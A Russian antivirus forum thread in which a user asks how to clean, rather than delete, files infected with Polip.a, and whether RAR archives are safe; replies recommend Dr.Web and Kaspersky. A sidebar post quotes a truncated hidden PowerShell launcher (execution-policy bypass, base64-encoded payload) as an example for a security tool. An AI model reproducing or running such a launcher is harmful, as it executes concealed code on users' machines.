Перейти к содержанию
subject

достал этот polip.a

Recommended Posts

subject

:( Установил ZoneAlarm Security Suite,и сразу обнаружилось куча polip.a.До этого даже ничего незаметно было,всё работало.Прога удаляет заражённые экзешники,из-за этого всё перестаёт работать,а как сделать чтобы она лечила а не удаляла?В проге пока плохо разбираюсь,подскажите пожалуйста.Или опять снести её,пусть как раньше работает,может не так уж опасен этот полип?

И второй вопрос,может ли этот полип пробраться в rar архивы,спрашиваю потому,что в архивах он ни разу не обнаруживался.Может тогда безопаснее хранить инсталяшки в архивах?Обьясните чайнику,спасибо. :blink:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
K_Mikhail
:( Установил ZoneAlarm Security Suite,и сразу обнаружилось куча polip.a.До этого даже ничего незаметно было,всё работало.Прога удаляет заражённые экзешники,из-за этого всё перестаёт работать,а как сделать чтобы она лечила а не удаляла?В проге пока плохо разбираюсь,подскажите пожалуйста.Или опять снести её,пусть как раньше работает,может не так уж опасен этот полип?

И второй вопрос,может ли этот полип пробраться в rar архивы,спрашиваю потому,что в архивах он ни разу не обнаруживался.Может тогда безопаснее хранить инсталяшки в архивах?Обьясните чайнику,спасибо. :blink:

Описание Win32.Polipos: http://info.drweb.com/virus_description/102959

Лечится сканером Dr.Web. В качестве экспересс-проверки и лечения можно использовать Dr.Web CureIt! (http://freedrweb.com). Для найденных объектов применить "Лечить".

\\Тут даже когда-то ролик вывешивали, да, видать по "нигламурности" для _кого-то_ быстро убрали - как сканер Dr.Web лечит файлы, поражённые Win32.Polipos, а _кто-то_ -- только удалял.\\

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber
\\Тут даже когда-то ролик вывешивали, да, видать по "нигламурности" для _кого-то_ быстро убрали - как сканер Dr.Web лечит файлы, поражённые Win32.Polipos, а _кто-то_ -- только удалял.\\

Уж не про этот ли ролик идет речь? ;)

http://www.anti-malware.ru/forum/index.php...&hl=Polip.A

А удалили его не мы - а на рапиде, за превышение срока хранения :))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
subject

И всё-таки я надеюсь,в архивы rar он наверно не лезет? :rolleyes:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин
И всё-таки я надеюсь,в архивы rar он наверно не лезет? rolleyes.gif

Dr.Web CureIt должен проверять файлы внутри архивов rar. Если он ничего не обнаруживает, то значит там чисто.

Установил ZoneAlarm Security Suite,

Какая версия Зоны стоит? Спрашиваю, потому что в последней версии должен стоять движок Касперского, и очень странно, что он не лечит Polipos, а только удаляет его.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dexter

Куреит не проверяет архивы.

Можно установить триал доктора и проверить на всякий случай. http://drweb.com/

полипос заражает исполняемые файлы, так что внутри rar он может оказаться если вы запаковали зараженный файл.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber
Спрашиваю, потому что в последней версии должен стоять движок Касперского, и очень странно, что он не лечит Polipos, а только удаляет его.

Кстати да, на данный момент Касперский лечит файлы зараженные P2P-Worm.Win32.Polip.a

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
subject
Какая версия Зоны стоит? Спрашиваю, потому что в последней версии должен стоять движок Касперского, и очень странно, что он не лечит Polipos, а только удаляет его.

ZoneAlarm Security Suite version:7.0.462.Я вообще-то пока не очень разбираюсь в проге. ;) Какая кнопка лечит то?

полипос заражает исполняемые файлы, так что внутри rar он может оказаться если вы запаковали зараженный файл.

Это понятно.Я имел ввиду безопасней хранить здоровые екзешки в архивах,полип их не должен увидеть.Я так думаю. :huh:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×